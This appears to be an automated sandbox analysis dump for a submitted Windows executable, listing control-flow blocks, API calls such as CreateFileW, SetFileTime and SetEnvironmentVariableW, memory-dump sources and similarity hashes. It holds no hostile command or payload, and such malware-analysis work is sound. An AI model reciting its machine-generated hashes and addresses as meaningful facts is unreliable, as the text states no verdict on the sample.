control_flow_graph 1001 8798e0-879901 call 88ec50 1004 879903-879906 1001->1004 1005 87990c 1001->1005 1004->1005 1006 879908-87990a 1004->1006 1007 87990e-87991f 1005->1007 1006->1007 1008 879927-879931 1007->1008 1009 879921 1007->1009 1010 879936-879943 call 876edb 1008->1010 1011 879933 1008->1011 1009->1008 1014 879945 1010->1014 1015 87994b-87996a CreateFileW 1010->1015 1011->1010 1014->1015 1016 87996c-87998e GetLastError call 87bb03 1015->1016 1017 8799bb-8799bf 1015->1017 1021 8799c8-8799cd 1016->1021 1026 879990-8799b3 CreateFileW GetLastError 1016->1026 1018 8799c3-8799c6 1017->1018 1020 8799d9-8799de 1018->1020 1018->1021 1024 8799e0-8799e3 1020->1024 1025 8799ff-879a10 1020->1025 1021->1020 1023 8799cf 1021->1023 1023->1020 1024->1025 1027 8799e5-8799f9 SetFileTime 1024->1027 1028 879a12-879a2a call 880602 1025->1028 1029 879a2e-879a39 1025->1029 1026->1018 1030 8799b5-8799b9 1026->1030 1027->1025 1028->1029 1030->1018
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00877760,?,00000005,?,00000011), ref: 0087995F
• GetLastError.KERNEL32(?,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0087996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00877760,?,00000005,?), ref: 008799A2
• GetLastError.KERNEL32(?,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008799AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008799F9
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 2b82c827910e98cf2bee58529059f6a56aa1e0e749882853ff81e69e73c79ad6
• Instruction ID: d5eb46e5b664b0cb18403aac630b62ea665878b6d3bb8e946e6d94b52e1ab0a4
• Opcode Fuzzy Hash: 2b82c827910e98cf2bee58529059f6a56aa1e0e749882853ff81e69e73c79ad6
• Instruction Fuzzy Hash: 93311130544745AFF7209B24CC46B9ABF98FB05320F204B19FAE9D61D5D3A4E984CB91

Control-flow Graph
• Block 1060: 88b568-88b581 (PeekMessageW)
• Block 1061: 88b5bc-88b5be
• Block 1062: 88b583-88b597 (GetMessageW)
• Block 1063: 88b5a8-88b5b6 (TranslateMessage, DispatchMessageW)
• Block 1064: 88b599-88b5a6 (IsDialogMessageW)
• Edges: 1060->1061, 1060->1062, 1062->1063, 1062->1064, 1063->1061, 1064->1061, 1064->1063
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
• IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
• TranslateMessage.USER32(?), ref: 0088B5AC
• DispatchMessageW.USER32(?), ref: 0088B5B6
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: 0edcac1e06e337240411adbb336701060838a32ab5a182fdee41635432e18806
• Instruction ID: ca2d2e035b3db4af86a2d2462d6d9028b7a6c418756a4ebf7033287d37adfbc5
• Opcode Fuzzy Hash: 0edcac1e06e337240411adbb336701060838a32ab5a182fdee41635432e18806
• Instruction Fuzzy Hash: E6F07071A0212ABB8B20AFE5EC4CDDB7FBCFE457917404515B515D2050EB74DA09CBB1

Control-flow Graph
• Block 1065: 88abab-88abca (GetClassNameW)
• Block 1066: 88abcc-88abe1 (call 881fbb)
• Block 1067: 88abf2-88abf4
• Block 1069: 88abff-88ac01
• Block 1070: 88abf6-88abf9 (SHAutoComplete)
• Block 1072: 88abf1
• Block 1073: 88abe3-88abef (FindWindowExW)
• Edges: 1065->1066, 1065->1067, 1066->1072, 1066->1073, 1067->1069, 1067->1070, 1070->1069, 1072->1067, 1073->1072
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 0088ABC2
• SHAutoComplete.SHLWAPI(?,00000010), ref: 0088ABF9
  • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0088ABE9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: c7004b4e9b333c0b7f9d19f75c046a3f88415dcf3191422efcf4022587f056a2
• Instruction ID: c6f3def3e9edc31ddd925e7c49317ffcb18ef72e34d13f5f02bfcc5cd39274d4
• Opcode Fuzzy Hash: c7004b4e9b333c0b7f9d19f75c046a3f88415dcf3191422efcf4022587f056a2
• Instruction Fuzzy Hash: 25F0823270162876EB2066649C09F9B776CFF46B50F484112BA45F21C0DBA0DE4586B7

Control-flow Graph
• Block 1074: 88dbde-88dc09 (call 88ec50, SetEnvironmentVariableW, call 880371)
• Block 1078: 88dc0e-88dc12
• Block 1079: 88dc14-88dc18
• Block 1080: 88dc36-88dc38
• Block 1081: 88dc21-88dc28 (call 88048d)
• Block 1084: 88dc1a-88dc20
• Block 1085: 88dc2a-88dc30 (SetEnvironmentVariableW)
• Edges: 1074->1078, 1078->1079, 1078->1080, 1079->1081, 1081->1084, 1081->1085, 1084->1081, 1085->1080
APIs
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088DBF4
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088DC30
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID: sfxcmd$sfxpar
• API String ID: 1431749950-3493335439
• Opcode ID: ae7f27fbdb05347ee52e2446fc8d74d622bc7916e139be759735a385028a2e4b
• Instruction ID: 87c939d9b49c444f7979df68ea823dc027bab8ea5ce65c1e3cb5bb4ac8529732
• Opcode Fuzzy Hash: ae7f27fbdb05347ee52e2446fc8d74d622bc7916e139be759735a385028a2e4b
• Instruction Fuzzy Hash: 4FF0E5B2504328ABEB213F99CC06BFA7B59FF16B85B040411FD85D6291E7B48980DBB1
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00879795
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008797AD
• GetLastError.KERNEL32 ref: 008797DF
• GetLastError.KERNEL32 ref: 008797FE
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 81313d4186f97e7249482aa45c2af4986b47ade693fb6f23429ee3a85fe4800c
• Instruction ID: 8a8f01f8c2fe7a62bc1a37988461e881485116366eea0000805717eb33a5f26f
• Opcode Fuzzy Hash: 81313d4186f97e7249482aa45c2af4986b47ade693fb6f23429ee3a85fe4800c
• Instruction Fuzzy Hash: 4411A130914608EBDF249F68C804A6A77A9FB433A4F10C939F4AEC5598E774DE44DB62
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008940EF,00000000,00000000,?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue), ref: 0089AD66
• GetLastError.KERNEL32(?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue,008A7970,FlsSetValue,00000000,00000364,?,008998B7), ref: 0089AD72
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0089ACDB,008940EF,00000000,00000000,00000000,?,0089AED8,00000006,FlsSetValue,008A7970,FlsSetValue,00000000), ref: 0089AD80
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                    • Opcode ID: 790143ad63b5bb3631bc12b5dc8c941a0924169ea44a97365fb3dd4484d6d397
                                                                                                                                                                                                    • Instruction ID: 52ba3cac8dadc64fe453197cdf6e4fdf79491e80fff01b90e83b4b0c063a3c51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 790143ad63b5bb3631bc12b5dc8c941a0924169ea44a97365fb3dd4484d6d397
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1012B36202236AFDF255B68DC44A577BA8FF467A37190720F906D7A50D721DD01C6E1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00881043
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0088108A
                                                                                                                                                                                                      • Part of subcall function 00876C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                                                                                                    • Opcode ID: 48fdf1545176969320d11cffde64af5be6337d4da76859fcf6aebe8055687b01
                                                                                                                                                                                                    • Instruction ID: 37c46fc8d18a8b0b98a1bd0db86b9619e50ee552d15b188dadba79ad020052e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48fdf1545176969320d11cffde64af5be6337d4da76859fcf6aebe8055687b01
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0501DB75344B096FEB317E68AC59B76735CFB80751F20002EF646D6384DFA1AC868725
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0087D343,00000001,?,?,?,00000000,0088551D,?,?,?), ref: 00879F9E
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0088551D,?,?,?,?,?,00884FC7,?), ref: 00879FE5
                                                                                                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0087D343,00000001,?,?), ref: 0087A011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4209713984-0
                                                                                                                                                                                                    • Opcode ID: 170ff267cab900cc629633f96d71ecda69a7b332e7d2ad6328fef65c8d4880f8
                                                                                                                                                                                                    • Instruction ID: 6247150d0c2f449735491fe0789f680b70bc097a9d144d9e1ecff1cedc55e872
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 170ff267cab900cc629633f96d71ecda69a7b332e7d2ad6328fef65c8d4880f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D531BF31208705EFDB18CF24D818B6E77A6FB85715F008919F589DB294CB75DD48CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087C27E: _wcslen.LIBCMT ref: 0087C284
                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A2D9
                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A30C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A329
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2260680371-0
                                                                                                                                                                                                    • Opcode ID: eaa75af857c6366a2a0e26c426a92bc2649d3938a4560f6695dcd6ba7aaffb07
                                                                                                                                                                                                    • Instruction ID: 7283f8610a274c7654d9caaa01f0c05773e05f0370364c01bb2de3829b00fdcb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaa75af857c6366a2a0e26c426a92bc2649d3938a4560f6695dcd6ba7aaffb07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF01B531614614AAEF29AF754C09BFD3248FF4A780F04C415F909E6199D764CAC186B7
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0089B8B8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                                    • Opcode ID: 9ccfebca344e939a16d05ae8a00e265d9a4dd4b80f51b46836a55d648863f329
                                                                                                                                                                                                    • Instruction ID: 5d359cfc2671796874365673876c05d0a4556466ae1b7bc703371387cbe068fe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ccfebca344e939a16d05ae8a00e265d9a4dd4b80f51b46836a55d648863f329
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD41F77050429C9EDF219E28DD84BF6BBE9FB45308F1804EDE69AC7142E335AA45CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0089AFDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx
• API String ID: 2568140703-3893581201
• Opcode ID: 6929ae1399871b0ae5d12d6b772995bcd915426e4faf128f6a971af95f692475
• Instruction ID: c204e2552ead0e245732b6b06cbea1e16672708d45afa15fe1aae6b0b0942eea
• Opcode Fuzzy Hash: 6929ae1399871b0ae5d12d6b772995bcd915426e4faf128f6a971af95f692475
• Instruction Fuzzy Hash: 1701483250420DBBDF06AF90DC02EEE7F62FF09754F094155FE14A6260CA368A31EB81
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0089A56F), ref: 0089AF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx
• API String ID: 2593887523-3084827643
• Opcode ID: 52942b38a2b0f5ad009c221fe58308318ce8bea84398e1454e25d640cba8225c
• Instruction ID: bbcf92d80e93e83f7e654895e2af7661dae6ae50eb9892ab5c78c2e6557d712a
• Opcode Fuzzy Hash: 52942b38a2b0f5ad009c221fe58308318ce8bea84398e1454e25d640cba8225c
• Instruction Fuzzy Hash: 62F0BE31645208BFDF166F54CC06DAEBFA1FF06B21B044066FD18EA260DA764E11EBC6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc
• API String ID: 2773662609-671089009
• Opcode ID: fd68fadeaa4d2e616c82e21bb37cdbb7e3e9fa8878459c105dcccd0b3efc1fcf
• Instruction ID: 8bff849043092ed7eb80e603f23e049066fd7a55265f3ab5855e9c2b53eba7a0
• Opcode Fuzzy Hash: fd68fadeaa4d2e616c82e21bb37cdbb7e3e9fa8878459c105dcccd0b3efc1fcf
• Instruction Fuzzy Hash: FEE05530640208BBEA04BB29CC02A2EBB50FB06721B08009AF800E7740CD784E0092C6
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088EAF9
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: 3Ro
• API String ID: 1269201914-1492261280
• Opcode ID: 7d66345c76ccc3b60e007820804d44e8f20975e3ccc2fc1a12adad5567c9236a
• Instruction ID: ec9de857fd49bf27e67171ecb4a7501b7d1a9ccc33acbf42135948e1cc8e4dce
• Opcode Fuzzy Hash: 7d66345c76ccc3b60e007820804d44e8f20975e3ccc2fc1a12adad5567c9236a
• Instruction Fuzzy Hash: 7CB012C629E4567D3108B3451D02C3F020CF5E1F90330813FF610C4581DC800C050933
APIs
  • Part of subcall function 0089B7BB: GetOEMCP.KERNEL32(00000000,?,?,0089BA44,?), ref: 0089B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0089BA89,?,00000000), ref: 0089BC64
• GetCPInfo.KERNEL32(00000000,0089BA89,?,?,?,0089BA89,?,00000000), ref: 0089BC77
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
